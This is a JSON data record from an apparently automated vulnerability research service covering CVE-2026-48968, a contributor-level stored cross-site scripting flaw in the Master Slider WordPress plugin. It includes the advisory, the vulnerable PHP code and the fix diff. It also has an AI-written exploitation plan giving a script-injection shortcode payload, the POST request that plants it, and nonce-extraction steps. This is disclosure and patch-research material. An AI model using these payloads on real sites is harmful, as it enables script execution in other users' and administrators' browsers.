[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f09CuxDWEQdsiT7b8KhJC_cyajps8h8kR5nsA0M4VezQ":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":26,"research_verified":27,"research_rounds_completed":28,"research_plan":29,"research_summary":30,"research_vulnerable_code":31,"research_fix_diff":32,"research_exploit_outline":33,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":27,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":27,"source_links":37},"CVE-2026-48968","master-slider-responsive-touch-slider-authenticated-contributor-stored-cross-site-scripting-5","Master Slider – Responsive Touch Slider \u003C= 3.10.8 - Authenticated (Contributor+) Stored Cross-Site Scripting","The Master Slider – Responsive Touch Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.10.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","master-slider",null,"\u003C=3.10.8","3.10.9","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-05-27 00:00:00","2026-06-01 16:27:54",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F0f17a161-83c8-4e83-a3e1-3e9f2e5f2c00?source=api-prod",6,[22,23,24,25],"README.txt","includes\u002Finit\u002Fdefine.php","includes\u002Fmsp-shortcodes.php","master-slider.php","researched",false,3,"# Vulnerability Research Plan: CVE-2026-48968 (Master Slider Stored XSS)\n\n## 1. Vulnerability Summary\nThe **Master Slider – Responsive Touch Slider** plugin (\u003C= 3.10.8) contains a stored cross-site scripting (XSS) vulnerability via the `[masterslider_pb]` shortcode. The vulnerability exists in the rendering logic for shortcode attributes, where the `title` parameter is concatenated into the page output without sanitization or output escaping. Authenticated users with **Contributor** privileges (who can create\u002Fedit posts but do not have `unfiltered_html` capabilities) can exploit this to execute arbitrary JavaScript in the context of any user (including Administrators) viewing the page.\n\n## 2. Attack Vector Analysis\n- **Shortcode Name:** `masterslider_pb` (registered in `includes\u002Fmsp-shortcodes.php`)\n- **Vulnerable Parameter:** `title`\n- **Required Authentication:** Contributor-level access or higher.\n- **Preconditions:** The attacker must be able to publish a post or have a published post they can edit containing the malicious shortcode.\n\n## 3. Code Flow\n1. **Hook Registration:** In `includes\u002Fmsp-shortcodes.php`, the plugin registers the shortcode:\n   ```php\n   add_shortcode( 'masterslider_pb', 'msp_masterslider_pb_shortcode' );\n   ```\n2. **Input Processing:** When a post is rendered, `msp_masterslider_pb_shortcode($atts, $content)` is invoked.\n3. **Attribute Extraction:** The function uses `shortcode_atts` and `extract` to populate variables:\n   ```php\n   $mixed = shortcode_atts(\n       array(\n             'id' \t  => '',\n             'title' => '',\n             'class' => ''\n       ),\n       $atts,\n       'masterslider_pb'\n   );\n   extract( $mixed ); \u002F\u002F Populates $title from user-provided shortcode attribute\n   ```\n4. **The Sink (Unescaped Output):** The `$title` variable is passed directly into a `sprintf` call without using `esc_html()` or `wp_kses()`:\n   ```php\n   $the_title_tag     = empty( $title ) ? '' : sprintf( '\u003Ch2>%s\u003C\u002Fh2>', $title );\n   ```\n5. **Rendering:** The resulting `$the_title_tag` is concatenated into `$output` and returned to be rendered on the page.\n\n## 4. Nonce Acquisition Strategy\nWhile the vulnerability is triggered by viewing a post (which requires no nonce), **creating** the post as a Contributor via the WordPress web interface requires a standard WordPress post-editing nonce.\n\n1. **Shortcode Context:** The plugin enqueues its assets when a shortcode is present. To find the script localization data (if needed for other endpoints), create a page with `[masterslider_pb]`.\n2. **Acquiring Post Nonce:**\n   - Navigate to `\u002Fwp-admin\u002Fpost-new.php` as a Contributor.\n   - Use `browser_eval` to extract the nonce:\n     ```javascript\n     document.querySelector('#_wpnonce').value\n     ```\n3. **Note on `wp_ajax`:** The provided source does not show any AJAX handlers requiring nonces for this specific exploit, as the attack relies on the standard `edit_posts` capability and the `[masterslider_pb]` shortcode renderer.\n\n## 5. Exploitation Strategy\n### Step 1: Authentication\nAuthenticate as a user with the **Contributor** role.\n\n### Step 2: Payload Construction\nConstruct a shortcode that breaks out of the `\u003Ch2>` context or simply executes within it.\n**Payload:** `[masterslider_pb title='\u003Cscript>alert(document.domain)\u003C\u002Fscript>']`\n\n### Step 3: Injection via HTTP Request\nSubmit a request to create\u002Fsave a post containing the payload.\n\n- **Method:** POST\n- **URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fpost.php`\n- **Content-Type:** `application\u002Fx-www-form-urlencoded`\n- **Body Parameters:**\n  - `action`: `editpost`\n  - `post_ID`: (The ID of a newly created draft)\n  - `_wpnonce`: (The nonce obtained from `post-new.php`)\n  - `post_title`: `XSS Test`\n  - `content`: `[masterslider_pb title='\u003Cscript>alert(document.domain)\u003C\u002Fscript>']`\n  - `post_status`: `publish` (or `pending` if Contributor cannot publish)\n\n### Step 4: Execution\nNavigate to the URL of the created post (e.g., `\u002F?p=[ID]`). The `\u003Ch2>` tag will be rendered as:\n```html\n\u003Ch2>\u003Cscript>alert(document.domain)\u003C\u002Fscript>\u003C\u002Fh2>\n```\n\n## 6. Test Data Setup\n1. **User:** Create a user `contributor_user` with the role `contributor`.\n2. **Plugin:** Ensure \"Master Slider\" is activated.\n3. **Draft Post:** Optionally create a draft post via WP-CLI to get a `post_ID` for the `http_request` step:\n   ```bash\n   wp post create --post_type=post --post_title='Draft' --post_author=$(wp user get contributor_user --field=ID)\n   ```\n\n## 7. Expected Results\n- When the post is viewed, the browser should trigger an alert box containing the site's domain.\n- The raw HTML response should contain the literal string: `\u003Ch2>\u003Cscript>alert(document.domain)\u003C\u002Fscript>\u003C\u002Fh2>`.\n\n## 8. Verification Steps\n1. **Check DB:** Verify the post content is stored exactly as sent:\n   ```bash\n   wp post get [ID] --field=post_content\n   ```\n2. **Check Output:** Use `http_request` to fetch the post and grep for the unescaped payload.\n3. **Browser Verification:** Use `browser_navigate` to the post URL and check for any alert dialogs or console errors.\n\n## 9. Alternative Approaches\nIf `masterslider_pb` is restricted, check the `ms_slider` shortcode (also in `includes\u002Fmsp-shortcodes.php`). Although its output logic was truncated in the source snippet, its huge list of attributes (like `class`, `template_class`, `inline_style`) are often similarly unescaped or insufficiently sanitized. Specifically, check the `$output` construction in `msp_masterslider_wrapper_shortcode`.","The Master Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcode attributes, most notably the 'title' parameter in the [masterslider_pb] shortcode. This occurs because the plugin fails to sanitize or escape user-provided attributes before rendering them in an HTML context, allowing contributors to execute arbitrary JavaScript.","\u002F\u002F includes\u002Fmsp-shortcodes.php:32\nfunction msp_masterslider_pb_shortcode( $atts, $content = null ) {\n\t$mixed = shortcode_atts(\n\t\tarray(\n\t\t      'id' \t  => '',\n\t\t      'title' => '',\n\t\t      'class' => ''\n\t\t),\n\t\t$atts,\n\t\t'masterslider_pb'\n\t);\n\n\textract( $mixed );\n\n\t$wrapper_open_tag  = sprintf( '\u003Cdiv class=\"avt_masterslider_el %s\" >', esc_attr( $class ) );\n\t$the_title_tag     = empty( $title ) ? '' : sprintf( '\u003Ch2>%s\u003C\u002Fh2>', $title );\n\t$wrapper_close_tag = '\u003C\u002Fdiv>';\n\t$slider_markup     = get_masterslider( $id );\n\t$output \t\t   = $wrapper_open_tag . $the_title_tag . $slider_markup . $wrapper_close_tag;\n\n\treturn apply_filters( 'masterslider_pb_shortcode', $output, $slider_markup, $wrapper_open_tag, $the_title_tag, $wrapper_close_tag );\n}","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmaster-slider\u002F3.10.8\u002Fincludes\u002Fmsp-shortcodes.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmaster-slider\u002F3.10.9\u002Fincludes\u002Fmsp-shortcodes.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmaster-slider\u002F3.10.8\u002Fincludes\u002Fmsp-shortcodes.php\t2025-05-06 12:23:12.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmaster-slider\u002F3.10.9\u002Fincludes\u002Fmsp-shortcodes.php\t2025-06-11 08:05:14.000000000 +0000\n@@ -39,7 +39,7 @@\n \textract( $mixed );\n \n \t$wrapper_open_tag  = sprintf( '\u003Cdiv class=\"avt_masterslider_el %s\" >', esc_attr( $class ) );\n-\t$the_title_tag     = empty( $title ) ? '' : sprintf( '\u003Ch2>%s\u003C\u002Fh2>', $title );\n+\t$the_title_tag     = empty( $title ) ? '' : sprintf( '\u003Ch2>%s\u003C\u002Fh2>', wp_kses_post( $title ) );\n \t$wrapper_close_tag = '\u003C\u002Fdiv>';\n \t$slider_markup     = get_masterslider( $id );\n \t$output \t\t   = $wrapper_open_tag . $the_title_tag . $slider_markup . $wrapper_close_tag;\n@@ -762,7 +762,7 @@\n \n \t\t$slide_content .= \"\\t\".sprintf('\u003Ca href=\"%s\" %s %s %s %s %s>%s\u003C\u002Fa>', $link, $att_link_target,\n \t\t                               \t\t\t$att_link_rel, $att_link_title, $att_link_class,\n-\t\t                               \t\t\t$att_link_id, $title ).\"\\n\";\n+\t\t                               \t\t\t$att_link_id, wp_kses_post( $title ) ).\"\\n\";\n \t}\n \n \t\u002F\u002F add layers that passed as content\n@@ -780,7 +780,7 @@\n \n \t\u002F\u002F markup for thumb in tab\n \t$tab_image   = empty( $tab_thumb ) ? '' : sprintf('\u003Cimg class=\"ms-tab-thumb\" src=\"%s\" alt=\"%s\" \u002F>', msp_get_the_absolute_media_url( $tab_thumb ), esc_attr( $alt ) ).\"\\n\";\n-\t$tab_context = empty( $tab )       ? '' : sprintf('\u003Cdiv class=\"ms-tab-context\">%s\u003C\u002Fdiv>', str_replace( '&quote;', '\"', wp_specialchars_decode( $tab ) ), $alt ).\"\\n\";\n+\t$tab_context = empty( $tab )       ? '' : sprintf('\u003Cdiv class=\"ms-tab-context\">%s\u003C\u002Fdiv>', wp_kses_post( str_replace( '&quote;', '\"', wp_specialchars_decode( $tab ) ), $alt )).\"\\n\";\n \n \t\u002F\u002F tab markup\n \tif( ! empty( $tab_image ) || ! empty( $tab_context ) ) {","To exploit this vulnerability, an attacker requires Contributor-level authentication or higher to create or edit a post. The attacker injects a malicious payload into the 'title' parameter of the [masterslider_pb] shortcode (e.g., [masterslider_pb title='\u003Cscript>alert(1)\u003C\u002Fscript>']). When a user (such as an administrator) views the post, the plugin processes the shortcode and inserts the raw, unescaped payload directly into the page's HTML within an \u003Ch2> tag, causing the browser to execute the script.","gemini-3-flash-preview","2026-06-04 17:54:16","2026-06-04 17:55:35",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","3.10.8","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmaster-slider\u002Ftags\u002F3.10.8","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmaster-slider.3.10.8.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmaster-slider\u002Ftags\u002F3.10.9","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmaster-slider.3.10.9.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmaster-slider\u002Ftags"]